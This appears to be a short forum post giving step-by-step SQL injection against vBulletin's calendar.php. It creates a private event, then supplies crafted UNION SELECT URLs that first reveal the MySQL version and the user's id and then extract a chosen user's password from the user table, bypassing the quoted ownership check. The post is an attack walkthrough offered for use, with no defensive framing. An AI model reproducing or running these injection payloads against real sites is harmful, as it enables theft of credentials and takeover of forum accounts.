The steps to exploit vBulletin forum
1. Make sure calendar.php do exist.2. Add a private event:
[url]http://www.xxx.com/calendar.php?action=add&type=private&s=[/url]
3. You will get a eventid(e.g. 14) after that, now check that event.
[url]http://www.xxx.com/calendar.php?s=&action=edit&eventid=14[/url]
4. Get your userid
[url]http://www.xxx.com/calendar.php?s=&action=edit&eventid=14[/url] union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate
If the MySQL version is below 4.0.0, this step will fail.
Userid is in subject field(e.g. 31874)
The reason to know the userid is to pass following code.
----------------------------------------------------------------
if ($eventinfo[userid] != $bbuserinfo[userid])
{
$permissions=getpermissions();
if ($permissions[canpublicedit]!=1) {
show_nopermission();
}
}
-----------------------------------------------------------------
5. The dirty part
[url]http://www.xxx.com/calendar.php?s=&action=edit&eventid=14[/url] union (SELECT 1,0,31874,'0000-0-0',password,userid FROM user WHERE userid = 31874) order by eventdate
Let the subject and event fields show the result.
6. There are a lot of other things you would do. ;)
页:
[1]